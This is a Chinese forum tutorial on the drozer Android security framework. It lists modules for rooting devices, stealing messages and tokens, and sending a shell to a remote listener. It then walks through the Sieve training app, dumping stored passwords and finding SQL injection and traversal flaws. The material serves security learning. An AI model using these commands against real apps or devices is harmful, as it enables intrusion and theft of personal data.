DROZER 目录
DROZER. 1
一、windows上安装drozer. 1
二、drozer使用... 1
三、drozer模块... 6
查找可以处理给定intent数据的app. 6
查找导出的activity. 6
启动指定的activity. 7
四、实例... 8
五、百度钱包app分析... 10
一、windows上安装drozer1. 下载安装https://labs.mwrinfosecurity.com ... installer-2.3.4.zip
移动端安装https://labs.mwrinfosecurity.com ... zer-agent-2.3.4.apk
2. 移动端打开drozer Agent并开启服务器
3. adb forward tcp:31415 tcp:31415
4. 在drozer目录下命令行执行drozerconsole connect见到图案即为连接成功
二、drozer使用通用命令
usage: drozer [COMMAND]
Run `drozer [COMMAND] --help` for moreusage information.
Commands:
console start the drozer Console
module manage drozer modules
server start a drozer Server
ssl manage drozer SSL key material
exploit generate an exploit todeploy drozer
agent create custom drozer Agents
payload generate payloads todeploy drozer
模块管理
usage: module [COMMAND]
Run the drozer Module and RepositoryManager.
The Repository Manager handles drozerModules and Module Repositories.
positional arguments:
command the command toexecute
options
optional arguments:
-h,--help
-d,--descriptions include descriptions whensearching modules (searchonly)
-f,--force force install modulesfrom the repositories (installonly)
available commands:
commands shows a list of allconsole commands
install install a new module
remote manage the sourcerepositories, from which you install modules
repository manage modulerepositories, on your local system
search search for modules
安装所有插件
for /F %i in ('drozer module search') dodrozer module install %i
查看可用exploit插件
E:\drozer>drozer exploit list
exploit.remote.browser.addjavascriptinterface
WebViewaddJavascriptInterface Remote Code Execution(CVE-2012-6636) exploit.remote.browser.knoxsmdm
Abuse the Newenrolment/UniversalMDMApplicationapplication in Samsung Knox suite to installrogue drozer agent exploit.remote.browser.nanparse
Webkit InvalidNaN Parsing (CVE-2010-1807) exploit.remote.browser.normalize
Webkit NodeNormalize (CVE-2010-1759) exploit.remote.browser.useafterfree
Webkit Use AfterFree Exploit (Black Hat 2010) exploit.remote.dos.remotewipe_browserdelivery
Invoke a USSDcode that performs a remote wipe on Samsung Galaxy SIII (Ekoparty 2012) exploit.remote.fileformat.polarisviewerbof_browserdelivery
Deliver PolarisViewer 4 exploit files over browser (Mobile Pwn2Own 2012) exploit.remote.fileformat.polarisviewerbof_generate
Generate PolarisViewer 4 exploit DOCX (Mobile Pwn2Own2012) exploit.remote.socialengineering.unknownsources
Deliver theRogue drozer Agent over browser and hold thumbs the user will install it exploit.usb.socialengineering.usbdebugging
Install a Roguedrozer Agent on a connected device that has USB debugging enabled
主界面
E:\drozer>drozer console connect
Selecting77dff31f0dc03413 (unknown Genymotion ('Phone' version) 2.3.7)
.. ..:.
..o.. .r..
..a.. . ....... . ..nd
ro..idsnemesisand..pr
.otectorandroidsneme.
.,sisandprotectorandroids+.
..nemesisandprotectorandroidsn:.
.emesisandprotectorandroidsnemes..
..isandp,..,rotectorandro,..,idsnem.
.isisandp..rotectorandroid..snemisis.
,andprotectorandroidsnemisisandprotec.
.torandroidsnemesisandprotectorandroid.
.snemisisandprotectorandroidsnemesisan:
.dprotectorandroidsnemesisandprotector.
drozerConsole (v2.3.4)
dz>help
drozer:Android Security Assessment Framework
Type`help COMMAND` for more information on a particular command, or `help
MODULE`for a particular module.
Commands:
cd contributors env help load permissions set unset
clean echo exit list module run shell
Miscellaneoushelp topics:
Intents
Load:文件作为脚本执行
Module:可执行drozer模块
Run:执行module
List:列出可执行模块
app.activity.forintent Find activities thatcan handle the given intent
app.activity.info Gets informationabout exported activities.
app.activity.start Start an Activity
app.broadcast.info Get informationabout broadcast receivers
app.broadcast.send Send broadcastusing an intent
app.broadcast.sniff Register abroadcast receiver that can sniff particular intents
app.package.attacksurface Get attack surface ofpackage
app.package.backup Lists packages that usethe backup API (returns true on FLAG_ALLOW_BACKUP)
app.package.debuggable Find debuggablepackages
app.package.info Get informationabout installed packages
app.package.launchintent Get launch intent ofpackage
app.package.list List Packages
app.package.manifest GetAndroidManifest.xml of package
app.package.native Find Nativelibraries embedded in the application.
app.package.shareduid Look for packageswith shared UIDs
app.provider.columns List columns incontent provider
app.provider.delete Delete from acontent provider
app.provider.download Download a file froma content provider that supports files
app.provider.finduri Find referencedcontent URIs in a package
app.provider.info Get informationabout exported content providers
app.provider.insert Insert into aContent Provider
app.provider.query Query a contentprovider
app.provider.read Read from acontent provider that supports files
app.provider.update Update a record ina content provider
app.service.info Get informationabout exported services
app.service.send Send a Messageto a service, and display the reply
app.service.start Start Service
app.service.stop Stop Service
auxiliary.develop.interactive Start an interactive Pythonshell
auxiliary.webcontentresolver Start a web serviceinterface to content providers.
exploit.badauth.callme1 Exploit CVE-2013-6272to initiate or kill phone calls.
exploit.badauth.callme2 Exploit CVE-2014-N/Ato conduct phone calls or send special codes.
exploit.badauth.smsdraftsend Exploit CVE-2014-8610Android < 5.0 SMS resend vulnerability (Baidu X-Team)
exploit.badauth.unlock Exploit CVE-2013-6271to delete all locks on device.
exploit.jdwp.check Open@jdwp-control and see which apps connect
exploit.pilfer.general.apnprovider Reads APN content provider
exploit.pilfer.general.settingsprovider Reads Settings content provider
exploit.pilfer.oem.samsung.accuweather Tests for Content Providervulnerability in com.sec.android.widgetapp.weatherclock.
exploit.pilfer.oem.samsung.appassword Tests for vulnerability incontent://settings/secure, that reveals Personal Hotspot AP password.
exploit.pilfer.oem.samsung.channelssms Tests for Content Providervulnerability in com.android.providers.telephony.
exploit.pilfer.oem.samsung.im Tests for Content Providervulnerability in com.sec.android.im.
exploit.pilfer.oem.samsung.logs.email Tests for Content Providervulnerability in com.sec.android.provider.logsprovider.
exploit.pilfer.oem.samsung.logs.im Tests for Content Providervulnerability in com.sec.android.provider.logsprovider.
exploit.pilfer.oem.samsung.logs.messaging Tests for Content Provider vulnerabilityin com.sec.android.provider.logsprovider.
exploit.pilfer.oem.samsung.memo Tests for Content Providervulnerability in com.sec.android.app.memo.
exploit.pilfer.oem.samsung.minidiary Tests for Content Providervulnerability in com.sec.android.app.minidiary.
exploit.pilfer.oem.samsung.postit Tests for Content Providervulnerability in com.sec.android.widgetapp.postit.
exploit.pilfer.oem.samsung.social_hub.im Tests for Content Providervulnerability in com.seven.Z7.
exploit.pilfer.oem.samsung.social_hub.impassword
Tests for Content Provider vulnerability in com.seven.Z7.
exploit.pilfer.oem.samsung.social_hub.instantmessages
Tests for Content Provider vulnerability in com.seven.Z7.
exploit.pilfer.oem.samsung.social_hub.messages Tests for Content Provider vulnerability incom.seven.Z7.
exploit.pilfer.oem.samsung.social_hub.registeredaccounts
Tests for Content Provider vulnerability in com.seven.Z7.
exploit.pilfer.thirdparty.idea.superbackup.calls
Grab call logs exported by Super Backup
exploit.pilfer.thirdparty.idea.superbackup.contacts
Grab Contact details exported by Super Backup
exploit.pilfer.thirdparty.idea.superbackup.smses
Grab SMS messages exported by Super Backup
exploit.pilfer.thirdparty.inkpad.notes.list Lists notes created with the InkPadapplication
exploit.pilfer.thirdparty.inkpad.notes.note Reads notes created with the InkPadapplication.
exploit.pilfer.thirdparty.maildroid.emails Grab Email messages from MailDroid
exploit.pilfer.thirdparty.seesmic.twitter.oauthtokens
Extracts the Twitter Secret from Seesmic
exploit.pilfer.thirdparty.shazam.gps Extract GPS location information.
exploit.pilfer.thirdparty.sophos.mobilecontrol.messages
Steal the Messages database from Sophos Mobile Control
exploit.root.cmdclient Obtain a root shellon an Acer Iconia and various Motorola devices.
exploit.root.exynosmem Obtain a root shellon Samsung Galaxy S2, S3, Note 2 and some other devices.
exploit.root.huaweip2 Obtain a root shellon a Huawei P2.
exploit.root.mmap_abuse Iterate through alldevices and attempt to exploit them to gain a root shell by abusing the
mmap device operation.
exploit.root.towelroot Obtain a root shellon devices running Android 4.4 KitKat and/or kernel build date < Jun 3
2014.
exploit.root.ztesyncagent Obtain a root shell on aZTE Score M and ZTE Skate.
information.datetime Print Date/Time
information.deviceinfo Get verbose deviceinformation
information.permissions Get a list of all permissions usedby packages on the device
intents.fuzzinozer fuzzinozer
post.capture.clipboard Retrieve and displaythe current clipboard text.
post.capture.location Get last known GPScoordinates of user
post.capture.screenrecording Take a video recording ofthe device's screen
post.capture.screenshot Take a screenshot ofthe device
post.perform.setclipboard Put the specified textinto the clipboard.
post.perform.startinstalledagent Start installed drozer agent.
post.pivot.portforward Start a port forward
scanner.activity.browsable Get all BROWSABLE activities that can beinvoked from the web browser
scanner.malware.virustotal Virus Scanner
scanner.misc.checkjavascriptbridge Check if addJavascriptInterfaceis used and can be abused
scanner.misc.native Find nativecomponents included in packages
scanner.misc.readablefiles Find world-readable filesin the given folder
scanner.misc.secretcodes Search for secret codesthat can be used from the dialer
scanner.misc.securerandom SecureRandom Check
scanner.misc.sflagbinaries Find suid/sgid binariesin the given folder (default is /system).
scanner.misc.weburls Find HTTP and HTTPSURLs specified in packages.
scanner.misc.writablefiles Find world-writable filesin the given folder
scanner.oem.samsung Test for multipleSamsung content provider vulnerabilities
scanner.provider.finduris Search for contentproviders that can be queried from our context.
scanner.provider.injection Test content providersfor SQL injection vulnerabilities.
scanner.provider.sqltables Find tables accessible through SQL injectionvulnerabilities.
scanner.provider.traversal Test content providersfor basic directory traversal vulnerabilities.
scanner.root.check Test forvulnerabilities that allow a malicious application to gain root access.
shell.exec Execute asingle Linux command.
shell.send Send anASH shell to a remote listener.
shell.start Enter into an interactive Linuxshell.
tools.file.download Download a File
tools.file.md5sum Get md5 Checksumof file
tools.file.size Get size offile
tools.file.upload Upload a File
tools.misc.installcert Install CAcertificate
tools.setup.busybox Install Busybox.
tools.setup.minimalsu Prepare 'minimal-su'binary installation on the device.
tools.setup.nmap Install Nmap.
tools.setup.sqlite3 Install SQLite3.
三、drozer模块查找可以处理给定intent数据的appusage: run app.activity.forintent [-h][--action ACTION] [--category CATEGORY [CATEGORY ...]]
[--component PACKAGE COMPONENT][--data-uri DATA_URI]
[--extra TYPE KEY VALUE] [--flagsFLAGS [FLAGS ...]]
[--mimetype MIMETYPE]
Find activities that can handle the formulatedintent
Examples:
Find activities that can handle webaddresses:
dz> run app.activity.forintent
--actionandroid.intent.action.VIEW
--data http://www.google.com
Package name: com.android.browser
Target activity: com.android.browser.BrowserActivity
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h,--help
--action ACTION specify theaction to include in the Intent
--category CATEGORY [CATEGORY ...]
specify the category toinclude in the Intent
--component PACKAGE COMPONENT
specify the componentname to include in the Intent
--data-uri DATA_URI specify aUri to attach as data in the Intent
--extra TYPE KEY VALUE
add an field to theIntent's extras bundle
--flags FLAGS [FLAGS ...]
specify one-or-moreflags to include in the Intent
--mimetype MIMETYPE specify theMIME type to send in the Intent
查找导出的activityusage: run app.activity.info [-h] [-aPACKAGE] [-f FILTER] [-i] [-u] [-v]
Gets information about exported activities.
Examples:
List activities exported by the Browser:
dz> run app.activity.info --package com.android.browser
Package: com.android.browser
com.android.browser.BrowserActivity
com.android.browser.ShortcutActivity
com.android.browser.BrowserPreferencesPage
com.android.browser.BookmarkSearch
com.android.browser.AddBookmarkPage
com.android.browser.widget.BookmarkWidgetConfigure
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h,--help
-aPACKAGE, --package PACKAGE
specify the package toinspect
-fFILTER, --filter FILTER
specify a filter termfor the activity name
-i,--show-intent-filters
specify whether toinclude intent filters
-u,--unexported include activities thatare not exported
-v,--verbose be verbose
启动指定的activityusage: run app.activity.start [-h][--action ACTION] [--category CATEGORY [CATEGORY ...]]
[--component PACKAGE COMPONENT][--data-uri DATA_URI]
[--extra TYPE KEY VALUE] [--flagsFLAGS [FLAGS ...]]
[--mimetype MIMETYPE]
Starts an Activity using the formulatedintent.
Examples:
Start the Browser with an explicit intent:
dz> run app.activity.start
--component com.android.browser
com.android.browser.BrowserActivity
--flags ACTIVITY_NEW_TASK
If no flags are specified, drozer will addthe ACTIVITY_NEW_TASK flag. To launch
an activity with no flags:
dz> run app.activity.start
--component com.android.browser
com.android.browser.BrowserActivity
--flags 0x0
Starting the Browser with an implicitintent:
dz> run app.activity.start
--actionandroid.intent.action.VIEW
--data-urihttp://www.google.com
--flags ACTIVITY_NEW_TASK
For more information on how to formulate anIntent, type 'help intents'.
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h,--help
--action ACTION specify theaction to include in the Intent
--category CATEGORY [CATEGORY ...]
specify the category toinclude in the Intent
--component PACKAGE COMPONENT
specify the componentname to include in the Intent
--data-uri DATA_URI specify aUri to attach as data in the Intent
--extra TYPE KEY VALUE
add an field to theIntent's extras bundle
--flags FLAGS [FLAGS ...]
specify one-or-moreflags to include in the Intent
--mimetype MIMETYPE specify theMIME type to send in the Intent
四、实例1.下载安装sieve app http://mwr.to/sieve
2.查看包名
dz> run app.package.list -f sievecom.mwr.example.sieve
3.查看基本信息
dz> run app.package.info -acom.mwr.example.sieve
Package: com.mwr.example.sieve
Process Name: com.mwr.example.sieve
Version: 1.0
Data Directory:/data/data/com.mwr.example.sieve
APK Path:/data/app/com.mwr.example.sieve-2.apk
UID: 10056
GID: [1028, 1015, 3003]
Shared Libraries: null
Shared User ID: null
Uses Permissions:
- android.permission.READ_EXTERNAL_STORAGE
- android.permission.WRITE_EXTERNAL_STORAGE
- android.permission.INTERNET
Defines Permissions:
- com.mwr.example.sieve.READ_KEYS
- com.mwr.example.sieve.WRITE_KEYS
4. 查找攻击点
dz> run app.package.attacksurfacecom.mwr.example.sieve
Attack Surface:
3 activities exported
0 broadcast receivers exported
2 content providers exported
2 services exported
is debuggable
可攻击activity
dz> run app.activity.info -acom.mwr.example.sieve
Package: com.mwr.example.sieve
com.mwr.example.sieve.FileSelectActivity
com.mwr.example.sieve.MainLoginActivity
com.mwr.example.sieve.PWList
可攻击provider
dz> run app.provider.info -acom.mwr.example.sieve
Package: com.mwr.example.sieve
Authority:com.mwr.example.sieve.DBContentProvider
Read Permission: null
Write Permission: null
Content Provider:com.mwr.example.sieve.DBContentProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
Path Permissions:
Path: /Keys
Type: PATTERN_LITERAL
Read Permission:com.mwr.example.sieve.READ_KEYS
Write Permission: com.mwr.example.sieve.WRITE_KEYS
Authority:com.mwr.example.sieve.FileBackupProvider
Read Permission: null
Write Permission: null
Content Provider:com.mwr.example.sieve.FileBackupProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
尝试启动
dz> run app.activity.start --componentcom.mwr.example.sieve com.mwr.example.sieve.PWList
5.攻击content provider
dz> run app.provider.querycontent://com.mwr.example.sieve.DBContentProvider/Passwords/
--vertical
_id: 1
service: Email
username: incognitoguy50
password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w==(Base64-encoded)
email: incognitoguy50@gmail.com
sql注入
dz> run app.provider.querycontent://com.mwr.example.sieve.DBContentProvider/Passwords/
--projection "'"
unrecognized token: "' FROMPasswords" (code 1): , while compiling: SELECT '
FROM Passwords
dz> run app.provider.querycontent://com.mwr.example.sieve.DBContentProvider/Passwords/
--selection "'"
unrecognized token: "')" (code1): , while compiling: SELECT * FROM Passwords
WHERE (')
Contentprovider弱点
dz> run scanner.provider.injection -acom.mwr.example.sieve
Scanning com.mwr.example.sieve...
Injection in Projection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
Injection in Selection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
dz> run scanner.provider.traversal -acom.mwr.example.sieve
Scanning com.mwr.example.sieve...
Vulnerable Providers:
content://com.mwr.example.sieve.FileBackupProvider/
content://com.mwr.example.sieve.FileBackupProvider
6.攻击service
dz> run app.service.info -acom.mwr.example.sieve
Package: com.mwr.example.sieve
com.mwr.example.sieve.AuthService
Permission: null
com.mwr.example.sieve.CryptoService
Permission: null
| 
|Archiver|小黑屋|技术宅的结界
( 滇ICP备16008837号 )|网站地图
发表于 2016-6-12 20:32:11
